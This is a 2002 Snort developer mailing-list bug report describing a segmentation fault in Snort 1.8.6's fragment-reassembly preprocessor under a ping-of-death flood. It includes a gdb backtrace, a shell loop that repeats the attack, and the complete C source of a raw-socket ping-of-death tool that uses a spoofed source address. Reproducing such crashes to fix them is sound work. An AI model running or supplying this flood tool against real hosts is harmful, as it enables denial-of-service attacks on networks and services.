[Snort-devel] snort 1.8.6 core dump when receive lot of ping of the death

axel.letourneur at ...1289... axel.letourneur at ...1289...
Thu Apr 25 06:40:03 EDT 2002



I use a program named ping-of-death1.c on a other host of a other network with
this shell command
while [ 1 -eq 1]; do ./ping-of-death1 X.X.X.X ; usleep 1; done
where X.X.X.X is the IP snort adress detector ( I don't try with the broadcast
adress of le snort detector ... )
after less than 1 minute snort core dump. the two machines have good network
between them.



System Architecture x86 ( in Makefile i586-pc-linux-gnu)
Operating system : redhat linux 7.0 with kernel 2.2.16-22
 command line switches use : ./snort -c ./rules/snort.conf -l log/  -D
I just uncomment "var HOME_NET $eth0_ADDRESS
and comment "var HOME_NET any"
I have only one interface eth0 and a loopback lo
I haven't got any snort error messages but  I have a core dump file

core file analyse with gdb


GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
Core was generated by `./snort -c ./rules/snort.conf -l log/ -D'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libnsl.so.1...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
Reading symbols from /lib/libnss_nisplus.so.2...done.
Loaded symbols for /lib/libnss_nisplus.so.2
Reading symbols from /lib/libnss_nis.so.2...done.
Loaded symbols for /lib/libnss_nis.so.2
#0  ubi_btTraverse (RootPtr=0x48, EachNode=0x807b680 <RebuildTraverse>,
    UserData=0x80cc4fa) at ubi_BinTree.c:1006
1006      ubi_btNodePtr p = ubi_btFirst( RootPtr->root );
(gdb) bt
#0  ubi_btTraverse (RootPtr=0x48, EachNode=0x807b680 <RebuildTraverse>,
    UserData=0x80cc4fa) at ubi_BinTree.c:1006
#1  0x807c18f in RebuildFrag (ft=0x84c92f0, p=0xbffff470) at spp_frag2.c:739
#2  0x807bbd2 in Frag2Defrag (p=0xbffff470) at spp_frag2.c:494
#3  0x80573de in Preprocess (p=0xbffff470) at rules.c:3545
#4  0x804a784 in ProcessPacket (user=0x0, pkthdr=0xbffff930, pkt=0x80caa42 "")
    at snort.c:548
#5  0x807cd5e in pcap_read ()
#6  0x807d32f in pcap_loop ()
#7  0x804bf9d in InterfaceThread (arg=0x0) at snort.c:1681
#8  0x804a2ec in main (argc=6, argv=0xbffffac4) at snort.c:478
#9  0x4006e790 in __libc_start_main (main=0x8049f50 <main>, argc=6,
    ubp_av=0xbffffac4, init=0x80496a4 <_init>, fini=0x808422c <_fini>,
    rtld_fini=0x4000d35c <_dl_fini>, stack_end=0xbffffabc)
    at ../sysdeps/generic/libc-start.c:111
(gdb)




the source of the ping of the death I use is name is ping-of-death1.c

/*
 * win95ping.c
 *
 * Simulate the evil win95 "ping -l 65510 buggyhost".
 * version 1.0 Bill Fenner <fenner at ...144...> 22-Oct-1996
 * version 1.01 Mike Bremford <Mike.Bremford at ...1290...> patched for Linux
 * version 1.02 Barak Pearlmutter <bap at ...1291...> clean compile
 *
 * This requires raw sockets that don't mess with the packet at all (other
 * than adding the checksum).  That means that SunOS, Solaris, and
 * BSD4.3-based systems are out.  BSD4.4 systems (FreeBSD, NetBSD,
 * OpenBSD, BSDI) will work.  Linux might work, I don't have a Linux
 * system to try it on.
 *
 * The attack from the Win95 box looks like:
 * 17:26:11.013622 cslwin95 > arkroyal: icmp: echo request (frag 6144:1480 at ...475...+)
 * 17:26:11.015079 cslwin95 > arkroyal: (frag 6144:1480 at ...575...+)
 * 17:26:11.016637 cslwin95 > arkroyal: (frag 6144:1480 at ...1292...+)
 * 17:26:11.017577 cslwin95 > arkroyal: (frag 6144:1480 at ...1293...+)
 * 17:26:11.018833 cslwin95 > arkroyal: (frag 6144:1480 at ...1294...+)
 * 17:26:11.020112 cslwin95 > arkroyal: (frag 6144:1480 at ...1295...+)
 * 17:26:11.021346 cslwin95 > arkroyal: (frag 6144:1480 at ...1296...+)
 * 17:26:11.022641 cslwin95 > arkroyal: (frag 6144:1480 at ...1297...+)
 * 17:26:11.023869 cslwin95 > arkroyal: (frag 6144:1480 at ...1298...+)
 * 17:26:11.025140 cslwin95 > arkroyal: (frag 6144:1480 at ...1299...+)
 * 17:26:11.026604 cslwin95 > arkroyal: (frag 6144:1480 at ...1300...+)
 * 17:26:11.027628 cslwin95 > arkroyal: (frag 6144:1480 at ...1301...+)
 * 17:26:11.028871 cslwin95 > arkroyal: (frag 6144:1480 at ...1302...+)
 * 17:26:11.030100 cslwin95 > arkroyal: (frag 6144:1480 at ...1303...+)
 * 17:26:11.031307 cslwin95 > arkroyal: (frag 6144:1480 at ...1304...+)
 * 17:26:11.032542 cslwin95 > arkroyal: (frag 6144:1480 at ...1305...+)
 * 17:26:11.033774 cslwin95 > arkroyal: (frag 6144:1480 at ...1306...+)
 * 17:26:11.035018 cslwin95 > arkroyal: (frag 6144:1480 at ...1307...+)
 * 17:26:11.036576 cslwin95 > arkroyal: (frag 6144:1480 at ...1308...+)
 * 17:26:11.037464 cslwin95 > arkroyal: (frag 6144:1480 at ...1309...+)
 * 17:26:11.038696 cslwin95 > arkroyal: (frag 6144:1480 at ...1310...+)
 * 17:26:11.039966 cslwin95 > arkroyal: (frag 6144:1480 at ...1311...+)
 * 17:26:11.041218 cslwin95 > arkroyal: (frag 6144:1480 at ...1312...+)
 * 17:26:11.042579 cslwin95 > arkroyal: (frag 6144:1480 at ...1313...+)
 * 17:26:11.043807 cslwin95 > arkroyal: (frag 6144:1480 at ...1314...+)
 * 17:26:11.046276 cslwin95 > arkroyal: (frag 6144:1480 at ...1315...+)
 * 17:26:11.047236 cslwin95 > arkroyal: (frag 6144:1480 at ...1316...+)
 * 17:26:11.048478 cslwin95 > arkroyal: (frag 6144:1480 at ...1317...+)
 * 17:26:11.049698 cslwin95 > arkroyal: (frag 6144:1480 at ...1318...+)
 * 17:26:11.050929 cslwin95 > arkroyal: (frag 6144:1480 at ...1319...+)
 * 17:26:11.052164 cslwin95 > arkroyal: (frag 6144:1480 at ...1320...+)
 * 17:26:11.053398 cslwin95 > arkroyal: (frag 6144:1480 at ...1321...+)
 * 17:26:11.054685 cslwin95 > arkroyal: (frag 6144:1480 at ...1322...+)
 * 17:26:11.056347 cslwin95 > arkroyal: (frag 6144:1480 at ...1323...+)
 * 17:26:11.057313 cslwin95 > arkroyal: (frag 6144:1480 at ...1324...+)
 * 17:26:11.058357 cslwin95 > arkroyal: (frag 6144:1480 at ...1325...+)
 * 17:26:11.059588 cslwin95 > arkroyal: (frag 6144:1480 at ...1326...+)
 * 17:26:11.060787 cslwin95 > arkroyal: (frag 6144:1480 at ...1327...+)
 * 17:26:11.062023 cslwin95 > arkroyal: (frag 6144:1480 at ...1328...+)
 * 17:26:11.063247 cslwin95 > arkroyal: (frag 6144:1480 at ...1329...+)
 * 17:26:11.064479 cslwin95 > arkroyal: (frag 6144:1480 at ...1330...+)
 * 17:26:11.066252 cslwin95 > arkroyal: (frag 6144:1480 at ...1331...+)
 * 17:26:11.066957 cslwin95 > arkroyal: (frag 6144:1480 at ...1332...+)
 * 17:26:11.068220 cslwin95 > arkroyal: (frag 6144:1480 at ...1333...+)
 * 17:26:11.069107 cslwin95 > arkroyal: (frag 6144:398 at ...1334...)
 *
 */
#define LINUX

#ifdef LINUX
#define REALLY_RAW
#define __BSD_SOURCE
#ifndef IP_MF
#define IP_MF           0x2000
#define IP_DF           0x4000
#define IP_CE           0x8000
#define IP_OFFSET       0x1FFF
#endif
#endif

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
//#include <netinet/ip_icmp.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <arpa/inet.h>

/*
 * If your kernel doesn't muck with raw packets, #define REALLY_RAW.
 * This is probably only Linux.
 */
#ifdef REALLY_RAW
#define FIX(x)  htons(x)
#else
#define FIX(x)  (x)
#endif


int
main(int argc, char **argv)
{
        int s;
        char buf[1500];
        struct ip *ip = (struct ip *)buf;
#ifdef LINUX
        struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
#else
        struct icmp *icmp = (struct icmp *)(ip + 1);
#endif
        struct hostent *hp;
        struct sockaddr_in dst;
        int offset;
        int on = 1;

        bzero(buf, sizeof buf);

        if ((s = socket(AF_INET, SOCK_RAW,
#ifdef LINUX
       IPPROTO_ICMP
#else
        IPPROTO_IP
#endif
        )) < 0) {
                perror("socket");
                exit(1);
        }
        if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
                perror("IP_HDRINCL");
                exit(1);
        }
        if (argc != 2) {
                fprintf(stderr, "usage: %s hostname\n", argv[0]);
                exit(1);
        }
        if ((hp = gethostbyname(argv[1])) == NULL) {
                if ((ip->ip_dst.s_addr = inet_addr(argv[1])) == -1) {
                        fprintf(stderr, "%s: unknown host\n", argv[1]);
                        exit(1);
                }
        } else {
                bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
        }
        printf("Sending to %s\n", inet_ntoa(ip->ip_dst));
        ip->ip_v = 4;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_tos = 0;
        ip->ip_len = FIX(sizeof buf);
        ip->ip_id = htons(4321);
        ip->ip_off = FIX(0);
        ip->ip_ttl = 255;
        ip->ip_p = 1;
//#ifdef LINUX
  //      ip->ip_csum = 0;                 /* kernel fills in */
//#else
        ip->ip_sum = 0;                 /* kernel fills in */
//#endif
//      ip->ip_src.s_addr = 0;          /* kernel fills in */
        ip->ip_src.s_addr = inet_addr("194.214.201.66");          /* kernel
fills in */

        dst.sin_addr = ip->ip_dst;
        dst.sin_family = AF_INET;

#ifdef LINUX
        icmp->type = ICMP_ECHO;
        icmp->code = 0;
        icmp->checksum = htons(~(ICMP_ECHO << 8));
                /* the checksum of all 0's is easy to compute */
#else
        icmp->icmp_type = ICMP_ECHO;
        icmp->icmp_code = 0;
        icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
                /* the checksum of all 0's is easy to compute */
#endif

        for (offset = 0; offset < 65536; offset += (sizeof buf - sizeof *ip)) {
                ip->ip_off = FIX(offset >> 3);
                if (offset < 65120)
                        ip->ip_off |= FIX(IP_MF);
                else
                        ip->ip_len = FIX(418);  /* make total 65538 */
                if (sendto(s, buf, sizeof buf, 0, (struct sockaddr *)&dst,
                                        sizeof dst) < 0) {
                        fprintf(stderr, "offset %d: ", offset);
                        perror("sendto");
                }
/*              else
                {
                printf("offset = %d:\n" ,offset);


                }
*/
                if (offset == 0) {
#ifdef LINUX
                        icmp->type = 0;
                        icmp->code = 0;
                        icmp->checksum = 0;
#else
                        icmp->icmp_type = 0;
                        icmp->icmp_code = 0;
                        icmp->icmp_cksum = 0;
#endif
                }
        }
        return 0;
}


thanks if you can help me

____________________________________________________________________________________________








More information about the Snort-devel mailing list